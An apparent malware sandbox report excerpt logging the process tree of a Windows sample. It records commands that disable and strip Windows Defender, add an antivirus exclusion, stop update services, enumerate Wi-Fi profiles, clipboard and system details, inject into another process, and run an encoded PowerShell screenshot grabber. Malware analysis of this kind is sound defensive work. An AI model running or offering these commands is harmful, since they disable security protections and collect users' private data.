Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

Modifies the context of a thread in another process (thread injection)

Source: C:\ProgramData\setup.exe

Thread register set: target process: 9052

Removes signatures from Windows Defender

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"			Jump to behavior

Writes to foreign memory regions

Source: C:\ProgramData\setup.exe

Memory written: C:\Windows\System32\dialer.exe base: EECF6B7010

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Process created: C:\Users\user\Desktop\iqA8j9yGcd.exe "C:\Users\user\Desktop\iqA8j9yGcd.exe"	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe -pbeznogym	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe -pbeznogym	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe -pbeznogym	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe -pbeznogym
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Process created: C:\ProgramData\main.exe "C:\ProgramData\main.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
Source: C:\ProgramData\svchost.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
Source: C:\ProgramData\main.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.cmdline"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ntoifwit\ntoifwit.cmdline"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB2CE.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCD2DF9DC1BB554A3A91A2FCAEEB39352E.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sirtu5ev\sirtu5ev.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBF6.tmp" "c:\Users\user\AppData\Local\Temp\sirtu5ev\CSCD8A1CC3D1CE048959A397DAF8AF51474.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBDBB.tmp" "c:\Windows\System32\CSC8CDC9FB2323C4007AF66CC17D2144E5.TMP"
